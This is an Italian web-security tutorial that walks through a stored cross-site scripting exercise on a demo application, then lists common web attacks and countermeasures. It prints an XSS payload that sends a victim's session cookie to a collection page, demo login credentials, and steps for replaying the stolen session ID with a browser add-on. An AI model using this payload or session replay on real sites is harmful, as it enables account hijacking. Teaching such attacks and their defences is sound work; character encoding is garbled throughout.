Come hackerare un sito web? Tecniche di hacking dei siti web
โก Riepilogo intelligente
Gli attacchi hacker ai siti web sfruttano le vulnerabilitร delle applicazioni web, come codice scritto male, input non sanificati e gestione inadeguata delle sessioni, per ottenere accessi non autorizzati. Questa pagina illustra le tecniche di attacco piรน comuni e, soprattutto, le contromisure per proteggere un sito web.

Oggi piรน persone hanno accesso a Internet che mai. Ciรฒ ha spinto molte organizzazioni a sviluppare applicazioni basate sul Web che gli utenti possono utilizzare online per interagire con l'organizzazione. Il codice scritto in modo inadeguato per le applicazioni web puรฒ essere sfruttato per ottenere l'accesso non autorizzato a dati sensibili e server web.
Imparerai le tecniche piรน comuni di hacking dei siti web e le contromisure per proteggersi da tali attacchi.
Come hackerare un sito web
In questo scenario pratico di hacking di siti Web, prenderemo il controllo della sessione utente dell'applicazione Web situata in www.techpanda.orgUtilizzeremo la tecnica del cross-site scripting per leggere l'ID di sessione del cookie, per poi usarlo per impersonare una sessione utente legittima.
Si parte dal presupposto che l'attaccante abbia accesso all'applicazione web e voglia dirottare le sessioni di altri utenti che utilizzano la stessa applicazione. L'obiettivo di questo attacco potrebbe essere quello di ottenere l'accesso amministrativo all'applicazione web, supponendo che l'account di accesso dell'attaccante sia limitato.
Passaggio 1) Apri URL http://www.techpanda.org/.
A scopo pratico, si raccomanda vivamente di ottenere l'accesso tramite SQL Injection. Fare riferimento a questo articolo sull'iniezione SQL per ulteriori informazioni su come farlo.
Passaggio 2) Inserire i dati di accesso.
L'indirizzo email per l'accesso รจ admin@google.com e la password รจ Password2010.
Passaggio 3) Controllare la dashboard.
Se l'accesso รจ andato a buon fine, visualizzerai la seguente dashboard.
Passaggio 4) Inserire nuovi contenuti.
Fai clic su Aggiungi nuovo contatto e inserisci il seguente nome:
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
Passaggio 5) Aggiungi JavaScript.
Il codice precedente utilizza JavaScript. Aggiunge un collegamento ipertestuale con un evento onclick. Quando l'utente ignaro fa clic sul collegamento, l'evento recupera il ID di sessione del cookie PHP e lo invia alla pagina snatch_sess_id.php insieme all'ID di sessione nel URL.
Passaggio 6) Aggiungere i dettagli.
Inserisci i dettagli rimanenti come mostrato di seguito e fai clic su Salva modifiche.
Passaggio 7) Controllare la dashboard.
La tua dashboard ora apparirร come nella schermata seguente.
Passaggio 8) Verificare l'ID di sessione.
Poichรฉ lo script cross-site รจ memorizzato nel database, viene caricato ogni volta che gli utenti con diritti di accesso effettuano l'accesso. Quando l'amministratore effettua l'accesso e fa clic sul collegamento ipertestuale che dice Dark, viene visualizzata una finestra con l'ID di sessione nel URL.
Nota: lo script potrebbe inviare il valore a un server remoto dove รจ memorizzato il PHPSESSID, per poi reindirizzare l'utente come se nulla fosse accaduto.
Nota: il valore ottenuto potrebbe essere diverso da quello mostrato qui, ma il concetto rimane lo stesso.
Rappresentazione della sessione utilizzando Firefox e componente aggiuntivo Tamper Data
Nota: il componente aggiuntivo Tamper Data classico mostrato di seguito non si installa piรน sulla versione corrente Firefoxma il concetto che illustra, ovvero intercettare e modificare una richiesta HTTP per riprodurre una sessione acquisita, rimane invariato.
Il diagramma di flusso seguente mostra i passaggi da eseguire per completare questo esercizio.
- Sarร necessario il Firefox Browser web per questa sezione e componente aggiuntivo Dati di manomissione.
- Apri Firefox e installare il componente aggiuntivo come mostrato negli schemi sottostanti.
- Cerca i dati di manomissione, quindi fai clic su installa come mostrato sopra.
- Fare clic su Accetta e installa...
- Al termine dell'installazione, fai clic su Riavvia ora.
- Abilita la barra dei menu in Firefox se non viene mostrato.
- Fai clic sul menu Strumenti, quindi seleziona Dati manomissione come mostrato di seguito.
- Si aprirร la seguente finestra. Nota: se la finestra non รจ vuota, fai clic sul pulsante Cancella.
- Fare clic sul menu Avvia manomissione.
- Tornare al Firefox Apri il browser web, digita http://www.techpanda.org/dashboard.php e premi il tasto Invio per caricare la pagina.
- Riceverai il seguente messaggio pop-up da Tamper Data.
- La finestra a comparsa ha tre (3) opzioni. L'opzione Tamper consente di modificare le informazioni dell'intestazione HTTP prima che vengano inviate al server.
- Cliccaci sopra.
- Si aprirร la seguente finestra.
- Copia l'ID di sessione PHP che hai copiato dall'attacco URL e incollalo dopo il segno di uguale. Il tuo valore ora dovrebbe apparire cosรฌ.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Clicca sul pulsante OK.
- Verrร visualizzata nuovamente la finestra popup relativa ai dati di manomissione.
- Deseleziona la casella di controllo che chiede Continuare la manomissione?
- Al termine, fai clic sul pulsante Invia.
- Dovresti visualizzare la dashboard come mostrato di seguito.
Nota: non abbiamo effettuato l'accesso; abbiamo simulato una sessione di accesso utilizzando il valore PHPSESSID recuperato tramite cross-site scripting.
Cos'รจ un'applicazione Web? Cosa sono le minacce Web?
Un'applicazione web (nota anche come sito web) รจ un'applicazione basata sul modello client-server. Il server fornisce l'accesso al database e la logica di business. ร ospitato su un server web. L'applicazione client viene eseguita sul browser web del client. Le applicazioni web sono solitamente scritte in linguaggi come Java, C#, VB.Net, PHPe ColdFusion Markup Language, ecc. I motori di database utilizzati nelle applicazioni web includono MySQL, MS SQL Server, PostgreSQL, SQLite, ecc.
Principali tecniche di hacking dei siti Web
La maggior parte delle applicazioni web sono ospitate su server pubblici server accessibili tramite Internet. Ciรฒ li rende vulnerabili agli attacchi a causa della facile accessibilitร . Di seguito sono elencate le minacce piรน comuni per le applicazioni web.
- SQL Injection โ lโobiettivo di questa minaccia potrebbe essere quello di aggirare gli algoritmi di accesso, sabotare i dati, ecc.
- Denial of Service attacchi โ l'obiettivo di questa minaccia potrebbe essere quello di negare agli utenti legittimi l'accesso alla risorsa.
- Cross-Site Scripting (XSS) โ l'obiettivo di questa minaccia potrebbe essere quello di iniettare codice eseguibile sul browser lato client.
- Avvelenamento da cookie/sessione โ lโobiettivo di questa minaccia รจ modificare i cookie/dati di sessione da parte di un utente malintenzionato per ottenere un accesso non autorizzato.
- Manomissione dei moduli โ lโobiettivo di questa minaccia รจ modificare i dati del modulo come i prezzi nelle applicazioni di e-commerce in modo che lโaggressore possa ottenere articoli a prezzi ridotti.
- Code Iniezione โ lโobiettivo di questa minaccia รจ iniettare codice come PHP, Python, ecc. che possono essere eseguiti sul server. Il codice puรฒ installare backdoor, rivelare informazioni sensibili, ecc.
- deturpazione โ l'obiettivo di questa minaccia รจ modificare la pagina visualizzata su un sito web e reindirizzare tutte le richieste di pagina a un'unica pagina contenente il messaggio dell'attaccante.
Come proteggere il tuo sito web dagli attacchi hacker?
Un'organizzazione puรฒ adottare la seguente politica per proteggersi dagli attacchi al server web.
- SQL Injection โ la sanificazione e la convalida dei parametri utente prima di inviarli al database per l'elaborazione possono contribuire a ridurre le possibilitร di essere attaccati tramite SQL Injection. I motori di database come MS SQL Server, MySQL, ecc. supportano parametri e istruzioni preparate. Sono molto piรน sicuri delle tradizionali istruzioni SQL.
- Attacchi Denial of Service โ I firewall possono essere utilizzati per bloccare il traffico proveniente da indirizzi IP sospetti se l'attacco รจ un semplice DoS. Una corretta configurazione delle reti e un sistema di rilevamento delle intrusioni possono inoltre contribuire a ridurre le probabilitร di successo di un attacco DoS.
- Cross-site scripting โ convalida e sanificazione delle intestazioni, dei parametri passati tramite URLI parametri dei moduli e i valori nascosti possono contribuire a ridurre gli attacchi XSS.
- Avvelenamento da cookie/sessione โ Ciรฒ puรฒ essere evitato crittografando il contenuto dei cookie, impostando una scadenza per i cookie dopo un certo periodo di tempo e associando i cookie all'indirizzo IP del client utilizzato per crearli.
- Manomissione dei moduli โ Ciรฒ puรฒ essere evitato convalidando e verificando l'input dell'utente prima di elaborarlo.
- Code Iniezione โ Ciรฒ puรฒ essere evitato trattando tutti i parametri come dati anzichรฉ come codice eseguibile. A tale scopo si possono utilizzare la sanificazione e la convalida.
- deturpazione โ un buon sicurezza delle applicazioni web La politica dovrebbe garantire la chiusura delle vulnerabilitร comunemente utilizzate per accedere al server web. Ciรฒ puรฒ includere una corretta configurazione del sistema operativo, del software del server web e delle migliori pratiche di sicurezza durante lo sviluppo.ping applicazioni web.
Controllare questo: 9 migliori URL Strumenti di scansione per verificare se un link รจ al sicuro da malware.


















